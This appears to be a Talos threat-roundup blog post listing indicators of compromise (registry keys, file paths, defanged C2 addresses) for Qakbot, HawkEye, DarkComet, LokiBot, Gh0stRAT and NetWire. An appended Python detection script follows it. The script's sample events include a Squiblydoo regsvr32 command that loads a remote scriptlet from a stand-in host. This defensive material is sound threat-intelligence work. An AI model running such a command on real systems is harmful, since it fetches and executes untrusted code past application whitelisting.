Friday, August 7, 2020

Threat Roundup for July 31 to August 7


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between July 31 and Aug. 7. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, it summarizes the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and discusses how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post lists only 25 of the associated file hashes and up to 25 IOCs for each category. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. Five distinct shades are used, with the darkest indicating that no files exhibited the technique's behavior and the brightest indicating that the behavior was observed in 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name (Type): Description

Win.Dropper.Qakbot-9146336-0 (Dropper): Qakbot, aka Qbot, has been around since at least 2008. Qbot primarily targets sensitive information like banking credentials but can also steal FTP credentials and spread across a network using SMB.

Win.Packed.HawkEye-9228219-0 (Packed): HawkEye is an information-stealing malware that specifically targets usernames and passwords stored by web browsers and mail clients on an infected machine. It is commonly spread via email and can also propagate through removable media.

Win.Dropper.DarkComet-9199045-1 (Dropper): DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.

Win.Dropper.LokiBot-9170218-0 (Dropper): Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from popular applications. It is commonly pushed via malicious documents delivered via spam emails.

Win.Dropper.Gh0stRAT-9224912-0 (Dropper): Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.

Win.Dropper.NetWire-9164792-0 (Dropper): NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.

Threat Breakdown

Win.Dropper.Qakbot-9146336-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: Type
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: ErrorControl
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: ImagePath
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: DisplayName
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: DependOnService
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: DependOnGroup
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: WOW64
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: ObjectName
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ 15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: Type
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: Start
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: ErrorControl
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: ImagePath
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: DisplayName
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: DependOnService
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: DependOnGroup
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: WOW64
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: ObjectName
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX 10
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: iyifdyu
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: cvuhzmmn
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: udilcq
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: pgmgxaj
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: gfnrpxh
1
Files and or directories created Occurrences
%APPDATA%\Microsoft\Amztggm 15
%APPDATA%\Microsoft\Amztggm\amztg.dll 15
%APPDATA%\Microsoft\Amztggm\amztgg.exe 15
%TEMP%\~amztgg.tmp 15
%APPDATA%\Microsoft\Eqfikq 10
%APPDATA%\Microsoft\Eqfikq\eqfi.dll 10
%APPDATA%\Microsoft\Eqfikq\eqfik.exe 10
%TEMP%\~eqfik.tmp 10
%APPDATA%\Microsoft\Duazxlbu\duazxl.dll 1
%APPDATA%\Microsoft\Duazxlbu\duazxlb.exe 1
%APPDATA%\Microsoft\Dcpptfmac\dcpptfm.dll 1
%APPDATA%\Microsoft\Dcpptfmac\dcpptfma.exe 1
%APPDATA%\Microsoft\Uunhru\uunh.dll 1
%APPDATA%\Microsoft\Uunhru\uunhr.exe 1
%APPDATA%\Microsoft\Wyrcaqdy\wyrcaq.dll 1
%APPDATA%\Microsoft\Wyrcaqdy\wyrcaqd.exe 1
%APPDATA%\Microsoft\Lhbdih\lhbd.dll 1
%APPDATA%\Microsoft\Lhbdih\lhbdi.exe 1
%APPDATA%\Microsoft\Zaemxbdja\zaemxbd.dll 1
%APPDATA%\Microsoft\Zaemxbdja\zaemxbdj.exe 1
%APPDATA%\Microsoft\Poebyko\poeby.dll 1
%APPDATA%\Microsoft\Poebyko\poebyk.exe 1
%APPDATA%\Microsoft\Gueathru\gueath.dll 1
%APPDATA%\Microsoft\Gueathru\gueathr.exe 1
%APPDATA%\Microsoft\Fiqyoi\fiqy.dll 1
*See JSON for more IOCs

File Hashes

*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection: AMP, ThreatGrid, MITRE ATT&CK




Win.Packed.HawkEye-9228219-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 22 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: Hidden
22
<HKCR>\LOCAL SETTINGS\MUICACHE\66\52C64B7E
Value Name: LanguageList
21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Update
3
Files and or directories created Occurrences
%APPDATA%\pid.txt 22
%APPDATA%\pidloc.txt 22
%TEMP%\Mail.txt 22
%TEMP%\Web.txt 22
%System32%\wbem\Logs\wbemprox.log 18
%TEMP%\dw.log 18
%TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp 17
\Sys.exe 9
\autorun.inf 9
E:\autorun.inf 9
E:\Sys.exe 9
%APPDATA%\WindowsUpdate.exe 3

File Hashes


Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection: AMP, ThreatGrid, MITRE ATT&CK




Win.Dropper.DarkComet-9199045-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\DC3_FEXEC 11
Mutexes Occurrences
DC_MUTEX-ZFF80Q7 11
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
209[.]97[.]151[.]172 11
204[.]79[.]197[.]200 2
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
pownedfag[.]pw 11
Files and or directories created Occurrences
%APPDATA%\dclogs 11
%TEMP%\ExdosVT 11
%TEMP%\ExdosVT\exmsae.exe 11
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\exmsae.vbs 11

File Hashes


Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection: AMP, ThreatGrid, Umbrella, MITRE ATT&CK




Win.Dropper.LokiBot-9170218-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 19 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\WINDOWS ERROR REPORTING\DEBUG
Value Name: StoreLocation
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\WINDOWS ERROR REPORTING\DEBUG
Value Name: StoreLocation
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: Hidden
1
<HKCU>\SOFTWARE\NETWIRE 1
<HKCU>\SOFTWARE\NETWIRE
Value Name: HostId
1
<HKCU>\SOFTWARE\NETWIRE
Value Name: Install Date
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: d89c6a81c7330d528071da246dac388b1e63d93dad11c332b093d6e2b4eb880a
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: d89c6a81c7330d528071da246dac388b1e63d93dad11c332b093d6e2b4eb880a
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: d9085f342d9c9d0d59c9db5e085f2034886007aa670d1cb141bde063f2fca871
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: d9085f342d9c9d0d59c9db5e085f2034886007aa670d1cb141bde063f2fca871
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: fcbeac9fe0d60767d0a54af568880f3032a9db588d492325ede97e219e69d6c0
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: fcbeac9fe0d60767d0a54af568880f3032a9db588d492325ede97e219e69d6c0
1
Files and or directories created Occurrences
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\desktop.ini.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\1033\dv_dexplore.hxs.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\1033\msenvui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\1033\vslogui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\1033\vsmsoui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\Microsoft.WizardFramework.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\Microsoft.WizardFrameworkVS.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\Visualui.TTF.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\cmddef.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\custsat.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\dexplore.exe.config.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\dexplore.exe.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\dexplore.exe.manifest.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\dexplore.prf.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\vslog.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help\1028\hxvzui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help\1031\hxdsui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help\1031\hxvzui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help\1033\hxdsui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help\1033\hxvzui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help\1036\hxdsui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help\1036\hxvzui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help\1040\hxdsui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help\1040\hxvzui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help\1041\hxdsui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
*See JSON for more IOCs

File Hashes


Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection: AMP, ThreatGrid, MITRE ATT&CK




Win.Dropper.Gh0stRAT-9224912-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 18 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: it
18
Mutexes Occurrences
98.126.40.18:3204 18
M98.126.40.18:3204 18
\Sessions\1\BaseNamedObjects\M98.126.40.18:3204 17
\Sessions\1\BaseNamedObjects\98.126.40.18:3204 17
\Sessions\1\BaseNamedObjects\0x5d65r455f 3
0x5d65r455f 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
107[.]163[.]43[.]161 18
98[.]126[.]40[.]20 18
98[.]126[.]40[.]18/31 18
99[.]86[.]230[.]49 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
blogx[.]sina[.]com[.]cn 3
blog[.]sina[.]com[.]cn 3
Files and or directories created Occurrences
\1.txt 18
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 18
%ProgramFiles%\<random, matching '[a-z]{5,9}\[a-z]{3,9}'>.exe 18
%ProgramFiles%\<random, matching '[a-z]{5,9}\[a-z]{3,9}'>.dll 18
%ProgramFiles%\<random, matching '[a-z]{5,8}'> 18
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp 17
%ProgramFiles%\osjmr\11220225 2

File Hashes


Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection: AMP, ThreatGrid, MITRE ATT&CK




Win.Dropper.NetWire-9164792-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\WINRAR 7
<HKCU>\SOFTWARE\WINRAR
Value Name: HWID
7
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9
Value Name: F
7
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5
Value Name: F
7
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC
Value Name: F
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: NetWire
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{MWL6CFL3-Q618-6BKD-A3S6-62B587EIG42V} 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{MWL6CFL3-Q618-6BKD-A3S6-62B587EIG42V}
Value Name: StubPath
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{80C05YHJ-SE4K-3AO5-QWV7-76Q74G80K50I} 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: microsofts
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{80C05YHJ-SE4K-3AO5-QWV7-76Q74G80K50I}
Value Name: StubPath
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{74G121A4-RDHN-CC75-UK35-2O8372AD7026} 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{74G121A4-RDHN-CC75-UK35-2O8372AD7026}
Value Name: StubPath
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{016Y712U-4LBJ-3H75-8D8M-KK3WW07Q65Q5} 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: adobe2
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{016Y712U-4LBJ-3H75-8D8M-KK3WW07Q65Q5}
Value Name: StubPath
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Imgburn
1
Mutexes Occurrences
- 11
<random, matching [a-zA-Z0-9]{5,9}> 8
Files and or directories created Occurrences
%APPDATA%\Install 15
%APPDATA%\Install\.Identifier 15
%APPDATA%\Install\Host.exe 13
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\drawname.vbs 8
%TEMP%\corelfolder 8
%TEMP%\corelfolder\drawname.exe 8
%LOCALAPPDATA%\Microsoft\Windows\WebCache\WebCacheV01.tmp 7
%TEMP%\-<random, matching '[0-9]{9}'>.bat 6
\TEMP\.Identifier 2
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\app.vbs 2
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\hhsghg.vbs 2
%TEMP%\Pictures 2
%TEMP%\Pictures\hhsghg.exe 2
%TEMP%\Win7x 2
%TEMP%\Win7x\app.exe 2
%APPDATA%\Install\netwire.exe 2
%TEMP%\subfolder 1
%TEMP%\subfolder\filename.scr 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\filename.vbs 1
%TEMP%\802093.bat 1
%APPDATA%\adobe2 1
%APPDATA%\adobe2\pdf.exe 1
%APPDATA%\adobe2\.Identifier 1
%APPDATA%\Imgburnl 1
%APPDATA%\Imgburnl\ImgBurn.exe 1
*See JSON for more IOCs

File Hashes

*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection: AMP, ThreatGrid, MITRE ATT&CK




Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Dealply adware detected - (16454)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
CVE-2019-0708 detected - (3369)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Crystalbit-Apple DLL double hijack detected - (2002)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a DLL double-hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and, in some cases, spyware deployment.
Process hollowing detected - (1565)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Squiblydoo application whitelist bypass attempt detected. - (1103)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker-controlled server.
Trickbot malware detected - (738)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Excessively long PowerShell command detected - (524)
A PowerShell command with a very long command-line argument, which may indicate an obfuscated script, has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
Installcore adware detected - (482)
InstallCore is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Gamarue malware detected - (253)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Kovter injection detected - (175)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
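As an added example (not code from the Talos post or its products), the following Python triage routine implements the two heuristics described under "Squiblydoo application whitelist bypass" and "Excessively long PowerShell command" above, run over constructed process-creation events: it flags PowerShell command lines above a length threshold (decoding an -EncodedCommand payload so an analyst can read it) and flags regsvr32 invocations whose /i: argument points at a remote URL. The length threshold, event field names, sample command lines and the scrobj.dll file name in the sample are assumptions, not values from the post.

```python
"""Triage of process-creation events for two behaviours described in the
Exploit Prevention section: an excessively long (typically encoded or
obfuscated) PowerShell command line, and a regsvr32 invocation that loads a
scriptlet from a remote URL (Squiblydoo). All events below are constructed."""
import base64
import re
from typing import Dict, List, Optional, Tuple

# Threshold is an assumption: baseline normal PowerShell usage before tuning it.
MAX_POWERSHELL_CMDLINE = 1024

# regsvr32's /i: argument pointing at an http(s) URL is the shape to detect.
REMOTE_SCRIPTLET = re.compile(r'/i:\s*"?https?://', re.IGNORECASE)

# powershell.exe accepts abbreviations of -EncodedCommand; longest first.
ENCODED_FLAG = re.compile(
    r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def _encode(script: str) -> str:
    """Build an -EncodedCommand payload the way PowerShell expects it
    (UTF-16LE, then base64). Used only to construct the sample events."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
REGSVR = r"C:\Windows\System32\regsvr32.exe"

# Constructed sample events (hypothetical pids and command lines).
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"pid": 1201, "image": PS,
     "cmdline": "powershell.exe -NoProfile -EncodedCommand " + _encode("Get-Date")},
    {"pid": 1202, "image": PS,
     "cmdline": "powershell.exe -w hidden -nop -enc "
                + _encode("$x = [Convert]::FromBase64String('AAAA'); " * 40)},
    {"pid": 1203, "image": REGSVR,
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\legit.dll"},
    # scrobj.dll as the scriptlet host and the URL are assumptions for the sample.
    {"pid": 1204, "image": REGSVR,
     "cmdline": "regsvr32.exe /s /n /u /i:http://example.invalid/payload.sct scrobj.dll"},
]


def encoded_script(cmdline: str) -> Optional[str]:
    """Decode the -EncodedCommand argument if present, else return None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed payload: still flagged by length, just not decoded


def classify(event: Dict[str, object]) -> List[str]:
    """Return the names of every rule the event trips (empty if none)."""
    hits: List[str] = []
    image = str(event["image"]).lower()
    cmdline = str(event["cmdline"])
    if image.endswith("powershell.exe") and len(cmdline) > MAX_POWERSHELL_CMDLINE:
        hits.append("excessively_long_powershell")
    if image.endswith("regsvr32.exe") and REMOTE_SCRIPTLET.search(cmdline):
        hits.append("squiblydoo_remote_scriptlet")
    return hits


def triage(events: List[Dict[str, object]]) -> List[Tuple[int, str, Optional[str]]]:
    """Return (pid, rule, decoded_script_or_None) for every flagged event."""
    findings: List[Tuple[int, str, Optional[str]]] = []
    for ev in events:
        for rule in classify(ev):
            findings.append((int(ev["pid"]), rule, encoded_script(str(ev["cmdline"]))))
    return findings


if __name__ == "__main__":
    for pid, rule, script in triage(SAMPLE_EVENTS):
        preview = (script or "")[:60]
        print(f"pid={pid} rule={rule} decoded={preview!r}")
```

A short, benign encoded command stays under the threshold, so the rule keys on length rather than on the mere presence of -EncodedCommand; the decoded text is returned so the analyst can judge the script itself.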
